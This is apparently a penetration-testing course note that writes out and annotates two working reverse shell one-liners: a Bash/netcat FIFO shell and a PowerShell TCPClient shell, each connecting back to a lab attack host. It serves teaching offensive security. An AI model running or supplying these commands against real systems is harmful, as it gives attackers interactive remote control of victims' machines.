3 - Intro to Payloads

# Netcat/Bash Reverse Shell One-liner Explanation ```bash rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f ``` ```bash rm -f /tmp/f; #remove /tmp/f file if it exists mkfifo /tmp/f; #make FIFO named pipe at /tmp/f cat /tmp/f | #connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe /bin/bash -i 2>&1 | #specifies the command language interpreter using the -i flag to ensure the shell is interactive; ensures stderr and stdout are rediected to the command that comes after the pipe nc 10.10.14.12 7777 > /tmp/f #uses netcat to send a connection to our attack host `10.10.14.12` listening on port `7777`; output is redirected to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed ``` # PowerShell Reverse Shell One-liner Explained ```cmd powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ```cmd powershell -nop -c #executes powershell.exe with no profile "$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443); #sets/evaluates the variable $client equal to the New-Object cmdlet, which creates an instance of System.Net.Sockets.TCPClient .NET framework object.; this .NET framework object will connect with the TCP socket listed in the parenthese $stream = $client.GetStream(); #sets/evaluates the variable $stream equal to $client, and the .NET framework method called [GetStream] that facilitates network communications [byte[]]$bytes = 0..65535|%{0}; #while loop containing the $i variable set equal to the .NET framework [Stream.Read] method {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); #sets/evaluates `$data` equal to an ASCII encoding .NET framework class that will be used in conjunction with the `GetString` method to encode the byte stream ($bytes) into ASCII; in short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text $sendback = (iex $data 2>&1 | Out-String ); #sets/evaluates $sendback equal to the Invoke-Expression (iex) cmdlet against $data, then redirects stderr and stdout through a pipe to the Out-String cmdlet which converts input objects into strings $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; #sets/evaluates $sendback2 equal to $sendback plus the string PS plus path to the working directory (`(pwd).path`) plus the string '> ' $sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()} #sets/evaluates $sendbyte equal to the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box $client.Close()" #TCPClient.Close methof that will be used when the connection is terminated ```